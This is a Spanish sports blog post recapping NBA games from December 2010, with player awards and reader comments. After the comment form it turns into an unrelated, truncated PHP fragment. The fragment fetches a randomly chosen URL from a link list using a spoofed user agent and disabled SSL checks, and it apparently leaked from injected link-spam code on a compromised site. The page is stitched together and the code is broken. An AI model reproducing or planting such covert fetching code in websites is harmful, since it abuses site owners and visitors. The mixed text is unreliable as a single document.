La Crónica (20/12/2010)

21 de December de 2010 por TheDeerHunter

Hubo grandes partidos y exhibiciones individuales anoche pero nos gustaría abrir con un tipo al que cada día admiramos más. Se trata de Jerry Sloan, entrenador de los Utah Jazz, que anoche alcanzó nada menos que a Pat Riley como el tercer entrenador en la historia con mayor número de victorias. Concretamente 1.209 desde el año 1988 ininterrumpidamente, insuflándo su personalidad seria y ganadora a una franquicia tradicionalmente humilde como los Utah Jazz. Mítico estratega y un genio. Sus pupilos no tuvieron grandes problemas frente a Cleveland para brindarle la victoria (101-90).

Después había 3 focos de máximo interés en la jornada. Los Mavs rompieron la racha de los Heat y lo hicieron en el American Airlines Arena en Miami (98-96). Fue un choque altamente igualado en el que Nowitzki, Terry y Butler aparecieron para enfrentarse a los 3 “beach boys”. En pequeños detalles como el buen hacer bajo tableros de Chandler y Marion así como el trabajo oscuro de DeShawn  Stevenson se decidió el choque. La buena noticia para los locales fue ver otra vez a Mike Miller vestido de corto. Podría ser fundamental para sus aspiraciones.

Los nuevos Magic empezaron con mal pie en Atlanta (81-91). Los locales salieron por fin motivados y organizaron una defensa que se les atragantó a sus rivales. Arenas salió de suplente y estuvo muy fallón. El mejor debutante fue Hedo Turkoglu. Por su parte los Spurs tuvieron que anotar 118 puntos para doblegar a unos Suns todavía minimizados por el traspaso (110-118). Gran partido de los 5 titulares más un hiperactivo Gary Neal.

Resumiendo el resto de encuentros: Los Pacers ahondaron en la crisis de los Hornets con partidazo de Granger y Posey desde la línea de 3 más un palmeo ganador de Mike Dunleavy (93-94); los Wizards, todavía sin Rashard Lewis, destrozaron a unos Bobcats que se quedaron en 75 puntos (75-108); los Blazers aprovecharon la lesión de Jennings para barrer a unos Bucks con demasiados problemas (80-106); los 44 puntacos de Monta no sirvieron para ganar a Houston (121-112), que rozan ya el 50% y Blake Griffin se comió a Love en Minnesotta (90-113).

PREMIOS

MVP: Lamarcus Aldridge destrozó el juego interior de los Bucks con 29 puntos, 19 rebotes, 2 asistencias, 2 robos y 2 tapones y Eric Gordon se fue a los 36 puntos, 6 asistencias y 5 robos. Ambos lideraron a sus equipos a la victoria.

Rookie: Blake Griffin a lo suyo con 22 puntos, 10 rebotes y 7 asistencias. Y los Clippers para arriba. A parte de Griffin, otro buen partido de Gary Neal con 22 puntos.

Sorpresa: Si a los Gordon, Griffin, Davis, Bledsoe, etc… le sumas el buen nivel de secundarios como Ryan Gomes, los Clippers tienen derecho a ilusionarse. Anoche el ex de los Wolves consiguió 22 puntos y 10 rebotes frente a su ex-equipo.

Decepción: Roy Hibbert se ha cascado un 1 de 10 pero en el mismo partido Trevor Ariza le ha respondido con un “fantástico” 1 de 13. ¡Vaya duelo!

Esfuerzo en vano: Monta Ellis es un genio, capaz de lo mejor y de lo peor. Anoche nos dejó una actuación brutal de 44 puntos (15 de 20), 7 asistencias y 3 robos. Lo que está por ver es si exhibiciones como esta sirven para conseguir victorias.

Comenta

7 comentarios a esta entrada

  1. Scriers dice:
    #1

    Griffin y Love, qué pena me dan, me recuerdan a Pau en Memphis, solo que estos 2 estan aun mejor :). Luego Miller va a ayudar muchísimo a miami, estoy seguro. Un tio que va a cerrar mejor el reebote que cualquier otro en su puesto y con muy buen tiro. Ademas le veo con valor de tirar sus canastas ante las estrellas. Espero que no salga el Miller de Minessota y que se parezca mas al de Memphis. ayer vi a Orlando y no moló nada.

      Citar

  2. -=TheKing=- dice:
    #2

    Me encanta el tiro que hace Griffin recibiendo de espaldas y sin botar se da la vuelta a la velocidad de rayo y la enchufa, bueno aun lo tiene que pulir un poco más porque sólo lo hace cuendo tine el pie derecho de pivote pero bueno, es letal, ganas tengo de que se cruce con Garnett y con Paum, van a sudar la gota forda para pararlo.

      Citar

  3. LEmontus dice:
    #3

    increible lo que parecen los bucks sin Jennings ayer todos parecían ser más malos y sin tener ni idea de que hacer….. me da a mi que vamos a estar un mesecito sin ganar un partido ….. que mala suerte para bucks y para mí.

      Citar

  4. busky23 dice:
    #4

    Orlando: Aún es pronto para sacar conclusiones pero la primera,en la frente.Triste debut de los nuevos,en especial Arenas que no dió pie con bola.
    Spurs: A lo suyo,nueva victoria con un G.Neal que me parece un jugadorazo. Eche de menos a Splitter,ayer no estaba ni el roster,preocupante,o es que Popovich quiere ir poco a poco con el brasileño?
    Portland: Aldrige asumiendo el liderazgo del equipo y un Rudy cada vez mejor,hoy 38 minutos,17 puntos. A llegado su momento y lo sabe,ahora o nunca.
    Clippers: 20-17-7 con 9 de 12 en tiros,Blake “la bestia” Griffin me sigue asombrando,por su manera de jugar y su increible regularidad,no tiene un partido malo,mirad el alley hoop de hoy a pase de Baron jojojo,la mejora de Eric Gordon también es notable,estos Clippers deben estar más arriba,en el camino están.
    Grande Sloan,el Ferguson de la NBA.

      Citar

  5. Denise dice:
    #5

    Menos mal que no trasnoché para ver a los nuevos Magic.
    El notición son los 3 partidos consecutivos buenos de Rudy.

      Citar

  6. Txusma dice:
    #6

    Salmons salió de inicio a hacer de base en los Bucks, eso lo dice todo. Es que el base suplente es Lentejita Boykins que no creo esté ya para estos trotes.

      Citar

  7. Sempren dice:
    #7

    Desde 2007 que no se quedaba LeBron sin anotar en toda la primera parte; ayer le volvió a pasar. Eso no fue impedimento para acabar anotando 19 puntos (y 10 rebotes).
    Miami vivió de rachas, primero Bosh, luego Wade con los suplentes, en la segunda parte algo de LeBron… pero no fue suficiente contra el EQUIPO de los Mavs.

    Por cierto, quien vea los 4 triples intentados por Miller en menos de 4 minutos flipará, pero fueron unos minutos bastante locos, con muchos rebotes ofensivos para los Heat, y con Miller siempre solo. Se nota la inactividad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>